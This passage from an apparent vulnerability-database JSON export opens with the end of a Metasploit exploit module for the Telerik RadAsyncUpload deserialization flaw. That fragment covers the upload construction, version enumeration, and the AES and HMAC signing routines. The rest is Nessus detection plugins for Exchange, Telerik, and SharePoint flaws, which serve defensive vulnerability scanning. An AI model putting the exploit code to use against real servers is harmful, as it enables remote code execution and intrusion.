'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/telerik_rau_deserialization.rb"}], "nessus": [{"lastseen": "2020-10-17T09:47:00", "description": "The Microsoft Exchange Server installed on the remote host\nis missing a security update. It is, therefore, affected by\nthe following vulnerability :\n\n - A remote code execution vulnerability exists in\n Microsoft Exchange software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the System user. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts. Exploitation of the\n vulnerability requires that a specially crafted email be\n sent to a vulnerable Exchange server. The security\n update addresses the vulnerability by correcting how\n Microsoft Exchange handles objects in memory.\n (CVE-2020-16875)", "edition": 5, "cvss3": {"score": 7.2, "vector": "AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-09-08T00:00:00", "title": "Security Updates for Exchange (September 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16875"], "modified": "2020-09-08T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS20_SEP_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/140427", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140427);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2020-16875\");\n script_xref(name:\"MSKB\", value:\"4577352\");\n script_xref(name:\"MSFT\", value:\"MS20-4577352\");\n script_xref(name:\"IAVA\", value:\"2020-A-0413-S\");\n\n script_name(english:\"Security Updates for Exchange (September 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing a security update. It is, therefore, affected by\nthe following vulnerability :\n\n - A remote code execution vulnerability exists in\n Microsoft Exchange software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the System user. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts. Exploitation of the\n vulnerability requires that a specially crafted email be\n sent to a vulnerable Exchange server. 
The security\n update addresses the vulnerability by correcting how\n Microsoft Exchange handles objects in memory.\n (CVE-2020-16875)\");\n # https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9455d8ba\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4577352 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16875\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange Server DlpUtils AddTenantDlpPolicy RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-09';\nkb = '4577352'; # Exchange Server 2019 CU 5-6 / 2016 CU 16-17\n\nkbs = make_list(kb);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\ninstall = get_single_install(app_name:'Microsoft Exchange');\n\npath = install['path'];\nversion = install['version'];\nrelease = install['RELEASE'];\nport = kb_smb_transport();\n\nif (\n release != 151 &&\n release != 152\n) audit(AUDIT_INST_VER_NOT_VULN, 'Exchange', version);\n\nif (!empty_or_null(install['CU']))\n cu = install['CU'];\nif (!empty_or_null(install['SP']))\n sp = install['SP'];\n\nif (release == 151) # Exchange Server 2016\n{\n if (cu == 16)\n {\n fixedver = '15.1.1979.6';\n }\n else if (cu == 17)\n {\n fixedver = '15.1.2044.6';\n }\n else if (cu < 16)\n {\n unsupported_cu = TRUE;\n }\n}\nelse if (release == 152) # Exchange Server 2019\n{\n if (cu == 5)\n {\n fixedver = '15.2.595.6';\n }\n else if (cu == 6)\n {\n fixedver = '15.2.659.6';\n }\n else if (cu < 5)\n {\n unsupported_cu = TRUE;\n }\n}\n\nif ((fixedver && hotfix_is_vulnerable(path:hotfix_append_path(path:path, value:\"Bin\"), file:'ExSetup.exe', version:fixedver, bulletin:bulletin, kb:kb))\n || (unsupported_cu && report_paranoia == 2))\n{\n if (unsupported_cu)\n hotfix_add_report('The Microsoft Exchange Server installed at ' + path +\n ' has an unsupported Cumulative Update (CU) installed and may be ' +\n 'vulnerable to the CVEs contained within the 
advisory. Unsupported ' +\n 'Exchange CU versions are not typically included in Microsoft ' +\n 'advisories and are not indicated as affected.\\n',\n bulletin:bulletin, kb:kb);;\n\n set_kb_item(name:'SMB/Missing/' + bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n\n\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-23T04:39:34", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability \nin the RadAsyncUpload function. This is exploitable when the encryption keys are known due to \nthe presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result \nin remote code execution. (As of 2020.1.114, a default setting prevents the exploit. \nIn 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-24T00:00:00", "title": "Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-18935", "CVE-2017-11317", "CVE-2017-11357"], "modified": "2020-04-24T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "href": "https://www.tenable.com/plugins/nessus/135970", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135970);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/22\");\n\n script_cve_id(\"CVE-2019-18935\");\n script_xref(name:\"IAVA\", value:\"2020-A-0219\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX RadAsyncUpload .NET Deserialization Vulnerability\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed on the remote Windows\nhost is affected by a deserialization vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability \nin the RadAsyncUpload function. This is exploitable when the encryption keys are known due to \nthe presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result \nin remote code execution. (As of 2020.1.114, a default setting prevents the exploit. \nIn 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\");\n # https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de2ce6ef\");\n # https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?&_ga=2.224762457.29387225.1587722153-1707628900.1586272484#allowedcustommetadatatypes\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be6fd178\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R3 2019 SP1\n(2019.3.1023) or later, and enable the type whitelisting feature of RadAsyncUpload.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-18935\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('install_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\n\napp_name = 'Telerik UI for ASP.NET AJAX';\nopt_in = FALSE;\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\n\n# 2020.1.114 and later have default settings available\nif (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2019.3.1023 has opt-in settings available, but not by default\nif ((ver_compare(ver:version, fix:'2019.3.1023', strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:'2020.1.114.0', strict:FALSE) <= 0))\n{\n opt_in = TRUE;\n}\n\nif (opt_in)\n{\n # if version is 2019.3.1023 or higher, but lower than 2020.1.114.0, \n # type whitelisting feature of RadAsyncUpload needs to be enabled manually.\n # so if we're paranoid, we add a note to the report\n # (done below) and if we're not paranoid, we audit out\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n}\n\nport = get_kb_item('SMB/transport');\nif (empty_or_null(port))\n 
port = 445;\n\nreport = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', '2019.3.1023'\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n);\n\nif (opt_in)\n report += '\\n\\n' + 'Although the type whitelisting feature of RadAsyncUpload is available for this version,' +\n '\\n' + 'we are not able to determine if this is actually enabled. Following the advisory,' +\n '\\n' + 'you should ensure that this is the case.';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-15T06:24:38", "description": "The Microsoft SharePoint Server 2016 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. 
An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. 
The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "title": "Security Updates for Microsoft SharePoint Server 2016 (October 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16941", "CVE-2020-16951", "CVE-2020-16945", "CVE-2020-16942", "CVE-2020-16953", "CVE-2020-16948", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16952"], "modified": "2020-10-13T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint"], "id": "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "href": "https://www.tenable.com/plugins/nessus/141436", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141436);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/13\");\n\n script_cve_id(\n \"CVE-2020-16941\",\n \"CVE-2020-16942\",\n \"CVE-2020-16944\",\n \"CVE-2020-16945\",\n \"CVE-2020-16946\",\n \"CVE-2020-16948\",\n \"CVE-2020-16951\",\n \"CVE-2020-16952\",\n \"CVE-2020-16953\"\n );\n script_xref(name:\"MSKB\", value:\"4486677\");\n script_xref(name:\"MSFT\", value:\"MS20-4486677\");\n script_xref(name:\"IAVA\", value:\"2020-A-0460-S\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2016 (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2016 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2016 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. 
The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. 
The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486677\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4486677 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft SharePoint Server-Side Include and ViewState RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-10';\n\nkbs = make_list(\n '4486677'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2016':\n { '0':\n {'Server':\n [{ \n 'kb' : '4486677',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\16\\\\bin',\n 'file' : 'onetutil.dll',\n 
'version' : '16.0.5071.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2016'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\n\n# grab the path otherwise\nforeach check (param_list)\n{\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if (check['kb'] == '4486677') xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-15T06:24:38", "description": "The Microsoft SharePoint Server 2019 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. 
(CVE-2020-16948,\n CVE-2020-16950, CVE-2020-16953)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. 
These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. 
